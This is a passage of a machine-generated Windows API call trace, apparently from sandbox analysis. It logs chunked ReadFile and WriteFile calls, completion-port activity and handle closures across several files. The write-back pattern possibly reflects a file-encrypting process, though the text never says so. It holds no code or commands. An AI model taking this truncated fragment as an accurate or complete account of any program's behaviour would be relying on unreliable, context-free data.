lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4670020) returned 1 [0150.379] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.379] WriteFile (in: hFile=0x648, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4790020) returned 1 [0150.379] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.379] WriteFile (in: hFile=0x644, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x48b0020) returned 1 [0150.379] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.379] WriteFile (in: hFile=0x658, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x49d0020) returned 1 [0150.379] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.379] WriteFile (in: hFile=0x670, lpBuffer=0x4af0124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4af0020) returned 1 [0150.393] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.393] WriteFile (in: hFile=0x61c, lpBuffer=0x4c10124*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4c10020) returned 1 [0150.393] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.393] ReadFile (in: hFile=0x67c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0150.393] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.393] ReadFile (in: hFile=0x65c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4670020) returned 0x0 [0150.393] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.393] ReadFile (in: hFile=0x648, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4790020) returned 0x0 [0150.393] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.393] ReadFile (in: hFile=0x644, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0150.393] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.393] ReadFile (in: hFile=0x658, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.394] ReadFile (in: hFile=0x670, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4af0020) returned 0x0 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.394] ReadFile (in: hFile=0x61c, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4c10020) returned 0x0 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.394] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.394] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.394] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.394] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.394] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.394] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0150.394] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.394] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0150.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.395] WriteFile (in: hFile=0x67c, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x41f0020) returned 1 [0150.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.395] WriteFile (in: hFile=0x65c, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4670020) returned 1 [0150.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.395] WriteFile (in: hFile=0x648, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4790020) returned 1 [0150.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.395] WriteFile (in: hFile=0x644, lpBuffer=0x48b0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x48b0020) returned 1 [0150.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.395] WriteFile (in: hFile=0x658, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x49d0020) returned 1 [0150.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.395] WriteFile (in: hFile=0x670, lpBuffer=0x4af0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4af0020) returned 1 [0150.395] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.396] WriteFile (in: hFile=0x61c, lpBuffer=0x4c10094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4c10020) returned 1 [0150.396] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.396] CloseHandle (hObject=0x67c) returned 1 [0150.397] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0150.398] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.398] CloseHandle (hObject=0x65c) returned 1 [0150.399] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0150.400] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.400] CloseHandle (hObject=0x648) returned 1 [0150.400] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0150.401] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.401] CloseHandle (hObject=0x644) returned 1 [0150.401] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0150.402] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.402] CloseHandle (hObject=0x658) returned 1 [0150.402] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x49d0020) returned 1 [0150.403] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.403] CloseHandle (hObject=0x670) returned 1 [0150.403] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4af0020) returned 1 [0150.404] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.404] CloseHandle (hObject=0x61c) returned 1 [0150.404] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4c10020) returned 1 [0150.405] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.532] ReadFile (in: hFile=0x640, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2f30020) returned 1 [0150.533] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.533] ReadFile (in: hFile=0x368, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4280020) returned 1 [0150.555] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.555] WriteFile (in: hFile=0x640, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x6b32, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020) returned 1 [0150.556] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.556] WriteFile (in: hFile=0x368, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x17ef4, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020) returned 1 [0150.556] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.556] ReadFile (in: hFile=0x640, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0150.556] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.556] ReadFile (in: hFile=0x368, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4280020) returned 0x0 [0150.556] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.556] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.557] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 0 [0150.557] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0150.557] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.557] WriteFile (in: hFile=0x640, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x2f30020) returned 1 [0150.557] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.557] WriteFile (in: hFile=0x368, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x40dfdb0, lpOverlapped=0x4280020) returned 1 [0150.557] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.557] CloseHandle (hObject=0x640) returned 1 [0150.558] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0150.558] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.558] CloseHandle (hObject=0x368) returned 1 [0150.560] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0150.560] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.636] ReadFile (in: hFile=0x644, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x2f30020) returned 1 [0150.763] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.763] ReadFile (in: hFile=0x66c, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4280020) returned 1 [0150.763] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.763] ReadFile (in: hFile=0x61c, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4700020) returned 1 [0150.764] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x40dfdb0, lpCompletionKey=0x40dfdac, lpOverlapped=0x40dfdb4) returned 1 [0150.764] ReadFile (in: hFile=0x658, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x40dfdb0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x40dfdb0*=0x0, lpOverlapped=0x4820020) returned 1 [0150.764] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, 